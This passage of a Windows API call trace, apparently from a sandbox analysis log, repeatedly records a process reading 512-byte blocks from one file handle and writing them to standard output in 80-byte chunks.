lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] GetFileType (hFile=0x4c) returned 0x1 [0107.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.081] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.081] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.082] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] GetFileType (hFile=0x4c) returned 0x1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] GetFileType (hFile=0x4c) returned 0x1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] GetFileType (hFile=0x4c) returned 0x1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.082] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.083] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.083] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.083] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.084] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.084] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.085] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.085] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.086] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.086] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.089] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.089] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.092] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.092] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.092] GetFileType (hFile=0x4c) returned 0x1 [0107.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.092] GetFileType (hFile=0x4c) returned 0x1 [0107.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.092] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.092] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.093] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.093] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.094] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.094] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, 